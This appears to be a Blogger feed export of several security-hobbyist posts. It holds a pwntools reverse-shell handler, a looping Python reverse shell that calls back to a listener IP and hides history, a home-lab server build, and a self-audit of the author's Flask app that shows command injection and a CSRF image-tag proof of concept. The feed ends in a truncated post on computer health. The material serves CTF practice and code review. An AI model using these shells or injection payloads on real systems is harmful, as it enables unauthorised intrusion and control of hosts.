I've been working with machines on HackTheBox and VM's from Vulnhub for a while. I got annoyed of typing commands again and again. I decided to use pwntools (Python library that provides a lot of functions for CTF and exploit dev usage, https://github.com/Gallopsled/pwntools) for handling reverse shell and sending commands. This is nothing new, I'm sure there are people and tools out there that automate some things after a machine is popped.<br />
<br />
For HTB and Vulnhub VM's I'm trying to avoid using tools such as metasploit, meterpreter, or anything that does everything and instead try to write my own tools and modify exploits. However, I do use nmap and enumeration tools/scripts...<br />
<br />
<b>Setup:</b><br />
For reverse shells that I get, they could have resulted from a custom python script, PHP code, or some binary exploit. If it's custom python script, I can add things I want the script to do before it connects back to me but for shell from PHP or exploit, I have to send commands after I get a reverse connection.<br />
<br />
This is what I have as my handler: <br />
<br />
from pwn import *<br />
<br />
l = listen(80)<br />
l.sendline(""" python -c 'import pty; pty.spawn("/bin/bash")'""")<br />
l.sendline(" export SHELL=bash")<br />
l.sendline(" export HISTFILE=/dev/null")<br />
l.sendline(" export TERM=xterm")<br />
l.sendline(" stty rows 38 columns 116")<br />
l.sendline(""" alias ls='ls -lha --color=auto'""")<br />
l.sendline("hostname")<br />
l.sendline("whoami")<br />
l.sendline("uname -a")<br />
l.sendline("ps aux")<br />
l.interactive()<br />
<div>
<br /></div>
<div>
It listens on port 80 and as soon as there is a reverse shell, it executes commands. l.interactive() gives you a shell.<br />
I change it depending on the situation. For one of the HTB machines, I had lines added to log in as one of the privileged users. You can also add commands in here to automatically download enumeration or privesc tools and execute them. <br />
<br />
Another common problem I've had is losing the shell. This typically happens because I pressed control+C after running a command I shouldn't have or didn't need to. I decided to modify my reverse python shell to make it run in an infinite loop, with sleep in the middle when disconnected. This was fine for a while but I didn't wanna have my reverse shell running on shared HTB machines all the time, if I happen to stop working on the machine or get disconnected and my IP changes. I changed the script and added a counter so after a while if it's not able to connect to me, the process ends.<br />
<br />
Here's what the reverse shell looks like:<br />
<br />
import socket, subprocess, os, time<br />
counter = 0<br />
while counter < 6:<br />
try:<br />
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);<br />
s.connect(("10.0.0.63",80));<br />
os.dup2(s.fileno(),0);<br />
os.dup2(s.fileno(),1);<br />
os.dup2(s.fileno(),2);<br />
counter = 0<br />
p=subprocess.call(["/bin/bash","-i"]);<br />
except:<br />
counter = counter + 1<br />
time.sleep(5)<br />
continue<br />
<br />
<br />
<b>Resources:</b><br />
https://github.com/Gallopsled/pwntools</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-47440451138136269342018-12-21T14:55:00.002-08:002018-12-21T14:55:28.484-08:00Virtualization server setupThis post is about how I have my virtualization server setup at home. I built it earlier this year. <div>
<br /></div>
<div>
Use cases for me are: running VM's, malware analysis, pentesting practice, processing data/logs, doing CTF stuff, running containers, virtualized networking, and so on...</div>
<div>
<br /></div>
<div>
<b>CPU</b>: AMD Ryzen 5 1600, it's 6 cores and 12 threads. It's cheap and good enough. </div>
<div>
<b>Motherboard</b>: B350M Mortar</div>
<div>
<b>RAM</b>: 4x8GB, total 32GB. It's good enough for running multiple VM's and containers. I had 16GB before and it worked fine.</div>
<div>
<b>Networking</b>: Motherboard has an onboard 1GB Ethernet. For a connection to a NAS, I added a 10GB MELLANOX NIC and a pair of those should cost around 30 bucks on ebay. Finally, I added 4x1GB ethernet NIC, which I think is sold by Syba on Amazon.</div>
<div>
<b>Case</b>: Thermaltake Versa H17</div>
<div>
<b>Storage</b>: 2x2TB HDD, 1x240GB SSD</div>
<div>
<br /></div>
<div>
<b>Virtualization setup</b>: I'm using Proxmox VE for virtualization. It supports VM's and Containers. On top of that, I'm using Docker as well. ServeTheHome has an article on how to set it up: <a href="https://www.servethehome.com/creating-the-ultimate-virtualization-and-container-setup-with-management-guis/">https://www.servethehome.com/creating-the-ultimate-virtualization-and-container-setup-with-management-guis/</a></div>
<div>
<br /></div>
<div>
The 2x2TB drives are installed in RAID 1 mode. Proxmox VE is installed on top of them. SSD contains ISO images for Linux, Windows, and etc. It also holds Container images. All of the VM content is saved to the HDD's. Additionally, all the data can be backed up via the 10GB link to the NAS. </div>
<div>
<br /></div>
<div>
Proxmox VE allows you to create templates based on VM's too. In my case, I have templates for Windows and Ubuntu server, which tools such as git, python, and etc. preinstalled. </div>
<div>
<br /></div>
<div>
With networking, Proxmox VE allows you to use OpenVSwitch, right from the WebUI. It lets you create virtualized networks just for VM's or use one of the hardware ports. This comes in very handy when doing malware analysis. For example, you can set up pfsense as a VM and add a virtualized network. You can also put the VM you're doing malware analysis on the virtualized network. Pfsense can be configured to route all the traffic through VPN. When malware traffic leaves the network, it ends up going through VPN. </div>
<div>
<br /></div>
<div>
Here's what the virtualization machine looks like on the inside:</div>
<div>
<span id="docs-internal-guid-e7138e25-7fff-7fce-ac88-059be12cc187"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-e9f4107b-7fff-a484-8ef1-f8d87ff4ccc3"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-f5a895b9-7fff-b771-f44d-f09bd076a34b"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><img height="313" src="https://lh6.googleusercontent.com/IQTAVjS_r9YAY93V8ezddRiG-UTCH01lTWlRq2PbD-ctkW--AYJ5QyR8ZEVbI_cR_XtH7QjkBkk03lv8fjgH72-MVw5ehDRmj-7gVBEOvyqBwtP1SdlkZ_JP-uFFt_lS_MF6y65l" style="border: none; transform: rotate(0rad);" width="400" /></span></span></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here's the back:</span></span></div>
<div>
<span id="docs-internal-guid-7a461c4e-7fff-5916-e2cd-df76010866ea"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-adf4bb14-7fff-8837-f9f4-46fdea432ea0"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><img height="400" src="https://lh5.googleusercontent.com/HtHKa4-eLBpxK12JB0VihWRzIIUIcW7caShAPLoiisQCQybVCI8foKtweILgMnbMmt4JZhAbVYXXZ5kxuqTg-Gjmrg4-NMPSrwOkbwC_XbFAuLUP6_cFSy-Jtbt8TUwGyk5Rvte0" style="border: none; transform: rotate(0rad);" width="256" /></span></span></div>
<div>
<br /></div>
<div>
Links:</div>
<div>
Proxmox VE: https://www.proxmox.com/en/proxmox-ve</div>
<div>
ServeTheHome - a really useful website: https://www.servethehome.com/</div>
<div>
Pfsense: https://www.pfsense.org/</div>
<div>
Opnsense (similar to pfsense): https://opnsense.org/</div>
<div>
Homelab subreddit, useful for looking at other setups and asking questions: https://www.reddit.com/r/homelab</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-14742355814955390102018-12-18T17:42:00.001-08:002018-12-18T17:42:29.273-08:00Doing vulnerability assessment of my own code...It's bad.<b>Introduction:</b><br />
I took "Application Security: for Hackers and Developers" class at Derbycon this year. More about the course is here: <a href="https://www.vdalabs.com/expert-training/security-training-courses/security-for-hackers-and-developers/">https://www.vdalabs.com/expert-training/security-training-courses/security-for-hackers-and-developers/</a> Videos are also available on PluralSight. Anyways, the class is focused on searching for vulnerabilities by using various methods such as static analysis, dynamic analysis, binary analysis, fuzzing, and etc.<br />
<br />
For a class I was taking this semester, I decided to write my final paper on different techniques used to review code and/on find security issues. I also decided to look at a project that I worked on a long time ago for the hands-on part.<br />
<br />
The project is runthelabs (can be found here: <a href="https://github.com/BoredHackerBlog/runthelabs">https://github.com/BoredHackerBlog/runthelabs</a>). It is a Python+Flask based web app that takes in a JSON configuration file and creates a virtual environment. It uses Minimega (<a href="http://minimega.org/">minimega.org</a>), KVM, OpenVSwitch, and NoVNC. It also uses SQLite for holding data.<br />
<br />
The point of it is that a teacher creates a JSON file with virtual environment specifications, uploads it, and starts the lab. The teacher can copy and send NoVNC links to students/groups so they can VNC into a VM and work on whatever. More info here: <a href="https://github.com/BoredHackerBlog/runthelabs/tree/master/documentation">https://github.com/BoredHackerBlog/runthelabs/tree/master/documentation</a><br />
<br />
When I put the project on Github, I knew it could have some kind of injection vulnerability. The code was written so long ago and I never got to updating everything. (laziness is not good for security)<br />
<br />
<b>Goal/Testing Purpose and Scope:</b><br />
The goal of this testing is to apply code review and security testing techniques and find security issues in my project. The scope is just my application/code. Third-party code or issues related to Minimega, KVM, OpenVSwitch, and etc. are not a concern.<br />
<br />
<b>Software Internals:</b><br />
api.py is the main flask app. There is a webUI and an API way of interacting with the app.<br />
config.py stores config information (paths to files and etc...)<br />
dbcontro.py is responsible for interacting with SQLite DB.<br />
mmcontrol.py is responsible for executing commands in relation to minimega, iptables, and openvswitch.<br />
mmstart.py parses JSON file uploaded by the admin and uses mmcontrol to set things up.<br />
<br />
There are two user roles. One admin and the other one is student/unauthenticated.<br />
<br />
Here's what the admin does: Uploads a JSON config file and starts the lab (which turns on VM's and sets up networking). Optionally, the admin can turn the whole lab off, reboot VM, change VNC password, and finally, share NoVNC link with the student.<br />
<br />
VNC can be accessed via realvnc or other VNC software with the correct port and password or NoVNC.<br />
<br />
Unauthenticated user: They can check server status (if it's up or not. Not very useful) and access VM's via VNC, if they have URL or password+port.<br />
<br />
The software uses SQLite DB to keep track of VM name, password, and port.<br />
<br />
Port 1337 is used for WebUI and API. Port 1338 is used for Websockify/NoVNC.<br />
<b><br /></b> <b>Testing Setup:</b><br />
To set up a testing environment, I needed one server to the run web app and two machines. One for static analysis/dynamic analysis/hacking and the other one for Admin/Teacher role.<br />
<br />
<b>Static Analysis:</b><br />
Static analysis is analyzing the code without running it. Here are useful OWASP links: <a href="https://www.owasp.org/index.php/Static_Code_Analysis">https://www.owasp.org/index.php/Static_Code_Analysis</a> & <a href="https://www.owasp.org/index.php/Source_Code_Analysis_Tools">https://www.owasp.org/index.php/Source_Code_Analysis_Tools</a><br />
<br />
I started by using bandit (<a href="https://github.com/PyCQA/bandit">https://github.com/PyCQA/bandit</a>) to scan my code. Here are some of the issues:<br />
<br />
<ul>
<li>Subprocess module is in use</li>
<li>Hardcoded password</li>
<li>Use of md5 function (used to generate VNC password, not a vuln)</li>
<li>Binding to all interfaces</li>
<li>Starting a process with shell (using os.system)</li>
<li>Starting a process with shell, with possible injection (it detects when external variables are used)</li>
</ul>
<div>
I also used Python-Taint (<a href="https://github.com/python-security/pyt">https://github.com/python-security/pyt</a>) It found that I was using a URL parameter as an input for SQL queries. </div>
<div>
<br /></div>
<div>
These tools are definitely useful for a larger project. They did find useful things. </div>
<div>
<br /></div>
<div>
I am also doing manual analysis. OWASP has guides on how to do a code review (<a href="https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project">https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project</a>) and I'm using those as well. </div>
<div>
<br /></div>
<div>
Here's what OWASP recommends focusing on:</div>
<div>
<span id="docs-internal-guid-ad3e481b-7fff-b5c1-46dc-bfd86f3308a4"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-35381c88-7fff-e65f-7259-7b9fb0dcda70"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="342" src="https://lh6.googleusercontent.com/_WsORS5j4NnFGFT6af9qcq0U-slIKhfObDDDkyiuSy5YppoUC8YwJ5XvueVlPEpDrsVf6HQqaXr7tTxllo36oAO8RMPf3GmWZGr5ivBdgCKeEVJaVOMWqESIghaxNjNeUULMlONz" style="border: none; transform: rotate(0rad);" width="606" /></span></span></div>
<div>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">OWASP also recommends looking at inputs and data flow. They have more things recommended but I wanna try to focus on vulnerability areas the above screenshot mentions and inputs. </span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<ul>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Data Validation: There isn't any. json.loads is used, which validates that the upload is json, however, that doesn't really matter. For starting a lab, JSON data has to be correct, however, values don't have to be. If something is int, string, or etc. it isn't checked. The uploaded file isn't saved on disk either. </span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Authentication: Admin has to login to use WebUI or API. api.py has a hardcoded password. </span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Session Management: Basic auth is used, so there isn't any. </span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Authorization: N/A</span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Cryptography: The WebUI/API access does not use SSL/TLS neither does the NoVNC connection. If someone was eavesdropping, they could get credentials.</span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Error Handling: Yes! I'm doing try-except then returning a generic error message. Also, in the try section, I'm doing If and returning a generic message. It's not perfect. There are some flaws. </span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Logging: None</span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Security Configuration: N/A</span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Network Architecture: The web app does bind to all interfaces. </span></span></li>
</ul>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">As for inputs, only admin has input capabilities. They can upload JSON file, reboot VM's, and change VM VNC password. </span></span></div>
</div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">For JSON file, POST request is used. (<a href="https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L46">https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L46</a>)</span></span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"> For rebooting VM's or changing VNC password, GET request is used with VM name in the URL. (</span><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><a href="https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L147">https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L147</a> <a href="https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L132">https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L132</a>)</span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here's the example config file:</span></span></div>
<div>
<span id="docs-internal-guid-30c9e68a-7fff-1c45-efde-b53f13df9cc3"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-30c9e68a-7fff-1c45-efde-b53f13df9cc3"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-e9d8d20e-7fff-320c-422a-775e2e95b875"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="409" src="https://lh5.googleusercontent.com/KdD_g69nhZJj76xWKVwFQP3_ifXgc9mfnFUhYCyjCeF_ZBj48AqEBLQKFtfg8lCuxHjUxqSRUg9rAuenZAaYEJTz0hff6B42gddjlonBvypX4kEnO7fU01WyCgQhJpMJFU9exB40" style="border: none; transform: rotate(0rad);" width="624" /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">For JSON file upload, it's done through /upload. The file is assigned to labconfig variable. When the lab is turned on (through /on), startlab() is called, which creates a db and calls mmstart.startmm(labconfig). startmm calls mmcontrol.start_mm(), which starts Minimega. After that, JSON file is processed. First thing looked at is gre, then dhcp, then internet, then finally VM. For VM, mmcontrol.vm_config ends up being called, which runs os.system statement with networking info. </span></span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">With JSON processing, there are several places a command could be injected. </span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">For VM reboot, here's what ends up being ran, when vmname is supplied via GET request:</span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">mmcontrol.vm_reboot(vmname, dbcontrol.get_password(vmname)), and in vm_reboot() this statement is executed first: os.system(minimega_cmd + "vm kill " + vm_name). Injection can happen here.</span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">For VM VNC password reset, mmcontrol.set_password() is used, which executes os.system(minimega_cmd + "vm qmp " + vm_name + " " + json.dumps(vncpwcmd)) first. In this case, the injection could occur in the middle of the statement.</span></span></div>
<br />
<b>Dynamic Analysis:</b><br />
For dynamic analysis, the application has to be running. I used OWASP ZAP, Subgraph Vega, and Nikto. They didn't actually find anything useful, which is expected, however, Nikto did guess hardcoded login admin/admin.<br />
<br />
I started doing manual analysis. I would use Burp but it really isn't needed for now.<br />
<br />
First, I uploaded a random file, which didn't do anything. I uploaded a random JSON file, and it was accepted. The labs wont start obviously since it's not a valid config file. After that, I took the example config file and injected commands. Here's what the new file looks like:<br />
<span id="docs-internal-guid-13f6ad77-7fff-a1ff-0b5c-163fcaabca5b"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="299" src="https://lh5.googleusercontent.com/i4y-p81ElX__55BO8m8Wl_ESWw0rr5z5SK-bQ-LrdLwUd8BssTFQGXN_8DYLJ8ajxIXdWfOJ6vZ5-fd1cPkbP35R6vknlM5GAB6YV90hnfMyN_ITuJWoO1X2-P8TgqwgwdWTHTIK" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span><br />
<br />
The command injection worked:<br />
<span id="docs-internal-guid-84bf83d7-7fff-f494-2972-850f40b46914"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="55" src="https://lh6.googleusercontent.com/-yL4MlgY5Xmsvhs-4aSIJ1UmIXG6XBbSJ2kHq0tKVNq-DAwEpme6S6t4082owhQr_FHSLdetsXzRDxPgw0lAl5_TEoChM9wgH1lXiVZyOxYzeq8Hn1wlIceNdvIT27xNeQwDKXDA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">After this, I uploaded the example JSON configuration which was included and started the lab the way it should be so I can try to mess with GET parameters. </span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">First the reboot:</span><br />
<img height="49" src="https://lh3.googleusercontent.com/6QD2evIoV41F20chNeR0ZFS-DYYAQvL-3gSRCIL_UWnubZs1OaCTM7OCmuzOAkjuy1uDSXUUAk1MN46YJUUSEhWSXlp_bILvS-q_RzcbitoV1wF1XMFOE4I97p7kI6dZzrD2RYc5" style="border: none; font-family: Arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre-wrap;" width="336" /><br />
<br />
It worked:<br />
<span id="docs-internal-guid-6b766a08-7fff-368d-f343-ee587fa671bd"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-73939765-7fff-4c81-93d8-8bab95d67ac8"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="75" src="https://lh6.googleusercontent.com/rKfu4iQbrvKJIg-uO9GM-BG8mBV7SBuB1DHpSz-rDwHwQXPzPMy8UZjHldqQPAOyNnTXBHZ6tsS2UDaf1Mt-imS6rKLHFMVuRdgQe8GGW4UeMrd21xgWsvHn1N-XOYdQMnUcjASg" style="border: none; transform: rotate(0rad);" width="624" /></span></span><br />
<br />
Next, the VNC password reset:<br />
<span id="docs-internal-guid-0336f237-7fff-9445-00da-1354a42a6ece"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-0336f237-7fff-9445-00da-1354a42a6ece"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-87f3823a-7fff-9fd5-68d5-efdc36c08551"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="53" src="https://lh3.googleusercontent.com/w4ptQoMdWbvw2SA3Fn89GswEQ3hILX7jNxwlG3agC3KoF-e186KOS9NS506ceImQu9ruxPap656P92bnIqfS-CvOs8F9jmIxVcmBJKpm94MzKOYc2Mbfk4gO0LvLH4G63AppRMdA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="388" /></span></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">That also worked:</span><br />
<span id="docs-internal-guid-223c20cf-7fff-1943-3da9-e7fcac2e3002"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="41" src="https://lh4.googleusercontent.com/J5dNG8QpbQEsdBODYnjaO8Nz49L9jPB0mullgT_sT8_ejznRHaa5BbnROl0XUTWm1nZTkPdX6UTVBZQNpG2zQaJOrxNmpGY0F6KAu-rninhW6U88S0mpIaaRMUXwtzaj5nLSXtCu" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Another issue with this software is cross-site request forgery. Since I'm not using session management or any other security, when a request is made via another webpage, if the admin is logged in, the request will get processed.</span></span><br />
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span> <span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">For example: <img src="http://10.0.0.53:1337/reboot/tc2" width="0" height="0" border="0"> embedded in another HTML page does cause a reboot for tc2. Of course, since I wasn't doing any checking to see if VM name is a valid name, the attacker, does not need to know vm name to execute commands.</span></span><br />
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span> <span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here's my new code, asdf vm doesn't exist:</span></span><br />
<span id="docs-internal-guid-502142d7-7fff-6464-eb5a-7066ea7c4f2a"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-0cf60b60-7fff-6d7f-b4fd-c3c355a60490"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><br />
<span id="docs-internal-guid-fd0dd3ac-7fff-365c-3634-5031015461ec"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="115" src="https://lh3.googleusercontent.com/ounx6c10Mcgs5q_ctknjDULWaUtgmwUyRug1e93S6PMR0m4xtd5VGt6mT38IT4EeZtgeIqoC4g6usyesZZTfQMrmN0Rhm9FrmcYACQYgbqwkEuU1F-C55I565ZTnkXVvEfbfOAPP" style="border: none; transform: rotate(0rad);" width="593" /></span></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">I logged into the admin account on another machine and opened the poc webpage:</span></span><br />
<span id="docs-internal-guid-1b53ea7c-7fff-0d59-9e0e-1476e98dd5a6"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="201" src="https://lh3.googleusercontent.com/lrmMZMCLCkrTgWHX_Ry0MiTFxIcDXHPvPIAVZ4PEWLdmx9yrWablTJL8JVTJ4E9FJNk14AuAf67DZPR5EP9mhhpbdd42C6WWql-WKLOVUuAXWXWjQM8ek0Ll0J4wtIJ7qJ0HDTGj" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="490" /></span></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">On my "hacker" machine:</span><br />
<span id="docs-internal-guid-77f83f1b-7fff-d4c9-3c9c-9a764a7f8612"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-b141d2f3-7fff-dfe2-7de8-e73976c70441"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="377" src="https://lh5.googleusercontent.com/NR_ohm_l0z1HcJrpqTmKkJyO8_iMBPwaXYsp-b2o9Sw56V6l6WqZ7fDAnlW2bMnFrqvSXABx6TWib_RvjU98_t4gsRGeR7yqoCpRcZVdoPv08pYLOs_cVW0dRVn9CvE50p6EW_QY" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span><br />
<br />
Dynamic analysis helps with confirming/validating some of the findings in static analysis.<br />
<br />
<b>Findings:</b><br />
<br />
<ol>
<li>Binding to all network interfaces</li>
<ol>
<li>This is bad because depending on the network configuration, the webui can be accessed from inside the VM</li>
</ol>
<li>Command injection</li>
<ol>
<li>Bad but only admin can do it (unless CSRF is used)</li>
</ol>
<li>Lack of data validation</li>
<ol>
<li>I should have validated everything in JSON file and even data from GET requests. For example, if vmname is supplied for reboot, I should check to see if that VM exists or not. I should make sure that I only allow a-z,A-Z,0-9 as input chars. </li>
</ol>
<li>Bad session management</li>
<ol>
<li>I probably shouldn't have used basic auth. Flask (or modules on top of Flask) has session management mechanisms that I could have used. CSRF token should be used. There are other web app protections that could be used as well.</li>
</ol>
<li>Cross-site request forgery</li>
<ol>
<li>CSRF token should be used. </li>
</ol>
<li>Lack of cryptography</li>
<ol>
<li>The way I imagined this web app would be used didn't require adding ssl/tls protection but it's still something I wanted to point out.</li>
</ol>
<li>Error handling could be better</li>
<ol>
<li>Error messages are generic. More detailed messages would be useful. Also, more error checking should be done. For example, if someone starts a lab with bad json file, code still starts minimega binary. That should not happen. Return from os.system should be checked too.</li>
</ol>
<li>Lack of logging</li>
<ol>
<li>I should have been logging some stuff, mainly errors. </li>
</ol>
</ol>
<div>
Basically, there are three ways to get root on the system running runthelabs. A non-admin user can use CSRF w/ command injection. A malicious admin can use various command injection points. Finally, a MITM attack can be used to capture admin credentials and those could be used to execute a command injection attack.<br />
<br /></div>
<div>
<b>Conclusion:</b></div>
<div>
It's possible that I may have missed something. Static and dynamic analysis both definitely were useful. OWASP is a great resource on code review. Also, this <span style="background-color: white;">Github </span>awesome list is very useful: <a href="https://github.com/mre/awesome-static-analysis">https://github.com/mre/awesome-static-analysis</a></div>
<div>
<br /></div>
<div>
The security issues occurred due to laziness and the risk/chances of exploitation were low. Also, I accepted the risk of possible command injection by the admin when I was programming. The impact is high since you can get root pretty easily with CSRF or if you were a malicious admin. </div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-24167577465130071402018-11-05T12:12:00.001-08:002018-11-05T12:12:19.797-08:00Computer usage and health<b><span style="font-family: Arial, Helvetica, sans-serif;">Introduction:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If you're in infosec or any other computer focused jobs such as sysadmin or a programmer, you may be spending a lot of time on a computer and/or sitting at a desk all day (or at least more than the average human being). This may come with health problems related to but not limited hands, eyes, back, and neck. In this post, I'll try to provide tools and tips that may help limit injuries or pain. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Disclaimer: I am not a doctor. This blog post does not provide any cures. Check links in the resources section for more information. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Tools/Tips:</span></b><br />
